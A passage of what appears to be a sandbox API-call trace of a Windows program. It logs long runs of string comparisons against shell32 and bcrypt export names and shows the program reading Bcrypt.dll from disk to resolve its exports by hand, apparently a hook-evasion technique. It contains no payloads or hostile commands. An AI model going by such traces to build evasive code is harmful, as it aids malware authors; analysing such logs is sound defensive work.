(lpString1="DAD_AutoScroll", lpString2="Control_RunDLLAsUserW") returned 1 [0230.932] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLW") returned 1 [0230.932] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0230.932] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0230.932] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0230.932] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0230.932] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0230.932] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0230.932] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0230.932] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="DAD_AutoScroll") returned 0 [0230.933] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AppCompat_RunDLLW") returned 1 [0230.933] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocCreateForClasses") returned 1 [0230.933] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocGetDetailsOfPropKey") returned 1 [0230.933] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CDefFolderMenu_Create2") returned 1 [0230.933] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CIDLData_CreateFromIDArray") returned 1 [0230.933] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0230.933] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CheckEscapesW") returned 1 [0230.933] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CommandLineToArgvW") returned 1 [0230.933] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLL") returned 1 [0230.933] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLA") returned 1 [0230.933] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLAsUserW") returned 1 [0230.933] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLW") returned 1 [0230.933] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0230.933] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0230.933] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0230.933] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0230.933] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0230.933] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0230.933] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0230.933] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_AutoScroll") returned 1 [0230.933] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_DragEnterEx") returned 0 [0230.933] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AppCompat_RunDLLW") returned 1 [0230.933] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocCreateForClasses") returned 1 [0230.933] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0230.934] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CDefFolderMenu_Create2") returned 1 [0230.934] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CIDLData_CreateFromIDArray") returned 1 [0230.934] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0230.934] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CheckEscapesW") returned 1 [0230.934] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CommandLineToArgvW") returned 1 [0230.934] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLL") returned 1 [0230.934] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLA") returned 1 [0230.934] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLAsUserW") returned 1 [0230.934] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLW") returned 1 [0230.934] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0230.934] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0230.934] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0230.934] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0230.934] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0230.934] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0231.229] GetProcessHeap () returned 0x560000 [0231.229] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x417f040 | out: hHeap=0x560000) returned 1 [0232.101] GetProcessHeap () returned 0x560000 [0232.101] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x10) returned 0x579090 [0232.104] LoadLibraryA (lpLibFileName="Bcrypt.dll") returned 0x7ffc5bcc0000 [0232.481] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0232.481] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0232.481] GetModuleFileNameA (in: hModule=0x7ffc5bcc0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")) returned 0x1e [0232.481] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0232.481] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0232.481] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0232.481] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=159648) returned 1 [0232.482] GetProcessHeap () returned 0x560000 [0232.482] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x26fa0) returned 0x2db2010 [0232.484] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0232.484] ReadFile (in: hFile=0x15c, lpBuffer=0x2db2010, nNumberOfBytesToRead=0x26fa0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2db2010*, lpNumberOfBytesRead=0x14f5a4*=0x26fa0, lpOverlapped=0x0) returned 1 [0232.489] CloseHandle (hObject=0x15c) returned 1 [0232.489] lstrcmpA (lpString1="BCryptAddContextFunction", lpString2="BCryptAddContextFunction") returned 0 [0232.490] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunction") returned 1 [0232.490] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunctionProvider") returned 0 [0232.490] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunction") returned 1 [0232.490] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunctionProvider") returned 1 [0232.490] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptCloseAlgorithmProvider") returned 0 [0232.490] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunction") returned 1 [0232.490] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0232.491] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0232.491] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptConfigureContext") returned 0 [0232.491] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunction") returned 1 [0232.491] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunctionProvider") returned 1 [0232.491] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0232.491] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContext") returned 1 [0232.491] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContextFunction") returned 0 [0232.491] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunction") returned 1 [0232.491] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0232.491] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0232.491] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContext") returned 1 [0232.491] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContextFunction") returned 1 [0232.491] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCreateContext") returned 0 [0232.491] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunction") returned 1 [0232.491] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0232.491] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0232.492] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContext") returned 1 [0232.492] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0232.492] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateContext") returned 1 [0232.492] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateHash") returned 0 [0232.492] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunction") returned 1 [0232.492] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0232.492] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0232.492] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContext") returned 1 [0232.492] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContextFunction") returned 1 [0232.492] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateContext") returned 1 [0232.492] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateHash") returned 1 [0232.492] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateMultiHash") returned 0 [0232.492] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunction") returned 1 [0232.492] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0232.492] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0232.492] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContext") returned 1 [0232.492] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0232.492] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateContext") returned 1 [0232.492] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateHash") returned 1 [0232.492] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateMultiHash") returned 1 [0232.492] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptDecrypt") returned 0 [0232.493] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunction") returned 1 [0232.493] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0232.493] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0232.493] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContext") returned 1 [0232.493] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContextFunction") returned 1 [0232.493] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateContext") returned 1 [0232.493] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateHash") returned 1 [0232.493] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateMultiHash") returned 1 [0232.493] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDecrypt") returned 1 [0232.493] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDeleteContext") returned 0 [0232.493] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunction") returned 1 [0232.493] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0232.493] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0232.493] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContext") returned 1 [0232.493] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContextFunction") returned 1 [0232.493] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateContext") returned 1 [0232.493] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateHash") returned 1 [0232.493] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateMultiHash") returned 1 [0232.493] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDecrypt") returned 1 [0232.494] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeleteContext") returned 1 [0232.494] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeriveKey") returned 0 [0232.494] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunction") returned 1 [0232.494] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunctionProvider") returned 1 [0232.494] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0232.494] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContext") returned 1 [0232.494] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContextFunction") returned 1 [0232.494] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateContext") returned 1 [0232.494] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateHash") returned 1 [0232.494] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateMultiHash") returned 1 [0232.494] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDecrypt") returned 1 [0232.494] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeleteContext") returned 1 [0232.494] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKey") returned 1 [0232.494] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKeyCapi") returned 0 [0232.494] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunction") returned 1 [0232.494] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunctionProvider") returned 1 [0232.495] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0232.495] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContext") returned 1 [0232.495] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContextFunction") returned 1 [0232.495] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateContext") returned 1 [0232.495] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateHash") returned 1 [0232.495] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateMultiHash") returned 1 [0232.495] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDecrypt") returned 1 [0232.495] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeleteContext") returned 1 [0232.495] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKey") returned 1 [0232.495] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyCapi") returned 1 [0232.495] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyPBKDF2") returned 0 [0232.495] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunction") returned 1 [0232.495] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0232.495] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0232.495] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContext") returned 1 [0232.495] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContextFunction") returned 1 [0232.495] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateContext") returned 1 [0232.495] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateHash") returned 1 [0232.495] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateMultiHash") returned 1 [0232.495] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDecrypt") returned 1 [0232.495] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeleteContext") returned 1 [0232.496] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKey") returned 1 [0232.496] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0232.496] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0232.496] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDestroyHash") returned 0 [0232.496] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunction") returned 1 [0232.496] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0232.496] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0232.496] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContext") returned 1 [0232.496] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContextFunction") returned 1 [0232.496] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateContext") returned 1 [0232.496] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateHash") returned 1 [0232.496] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateMultiHash") returned 1 [0232.496] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDecrypt") returned 1 [0232.496] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeleteContext") returned 1 [0232.496] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKey") returned 1 [0232.496] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0232.496] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0232.496] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyHash") returned 1 [0232.496] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyKey") returned 0 [0232.496] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunction") returned 1 [0232.497] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunctionProvider") returned 1 [0232.497] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0232.497] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContext") returned 1 [0232.497] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContextFunction") returned 1 [0232.497] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateContext") returned 1 [0232.497] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateHash") returned 1 [0232.497] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateMultiHash") returned 1 [0232.497] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDecrypt") returned 1 [0232.497] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeleteContext") returned 1 [0232.497] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKey") returned 1 [0232.497] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyCapi") returned 1 [0232.497] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0232.497] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyHash") returned 1 [0232.497] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyKey") returned 1 [0232.497] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroySecret") returned 0 [0232.497] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunction") returned 1 [0232.497] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0232.497] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0232.497] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContext") returned 1 [0232.497] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0232.497] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateContext") returned 1 [0232.497] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateHash") returned 1 [0232.497] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateMultiHash") returned 1 [0232.497] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDecrypt") returned 1 [0232.497] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeleteContext") returned 1 [0232.498] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKey") returned 1 [0232.498] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0232.498] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0232.498] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyHash") returned 1 [0232.498] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyKey") returned 1 [0232.498] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroySecret") returned 1 [0232.498] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDuplicateHash") returned 0 [0232.498] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunction") returned 1 [0232.498] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0232.498] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0232.498] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContext") returned 1 [0232.498] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContextFunction") returned 1 [0232.498] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateContext") returned 1 [0232.498] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateHash") returned 1 [0232.498] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateMultiHash") returned 1 [0232.498] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDecrypt") returned 1 [0232.498] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeleteContext") returned 1 [0232.498] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKey") returned 1 [0232.498] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0232.498] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0232.498] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyHash") returned 1 [0232.498] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyKey") returned 1 [0232.498] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroySecret") returned 1 [0232.498] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateHash") returned 1 [0232.498] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateKey") returned 0 [0232.498] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunction") returned 1 [0232.498] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0232.498] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0232.498] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContext") returned 1 [0232.499] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0232.499] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateContext") returned 1 [0232.499] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateHash") returned 1 [0232.499] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateMultiHash") returned 1 [0232.499] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDecrypt") returned 1 [0232.499] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeleteContext") returned 1 [0232.499] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKey") returned 1 [0232.499] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyCapi") returned 1 [0232.499] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0232.499] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyHash") returned 1 [0232.499] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyKey") returned 1 [0232.499] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroySecret") returned 1 [0232.499] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateHash") returned 1 [0232.499] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateKey") returned 1 [0232.499] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptEncrypt") returned 0 [0232.499] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunction") returned 1 [0232.499] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunctionProvider") returned 1 [0232.499] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0232.499] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContext") returned 1 [0232.499] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContextFunction") returned 1 [0232.499] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateContext") returned 1 [0232.499] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateHash") returned 1 [0232.499] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateMultiHash") returned 1 [0232.499] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDecrypt") returned 1 [0232.499] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeleteContext") returned 1 [0232.499] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKey") returned 1 [0232.499] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyCapi") returned 1 [0232.499] lstrcmpA 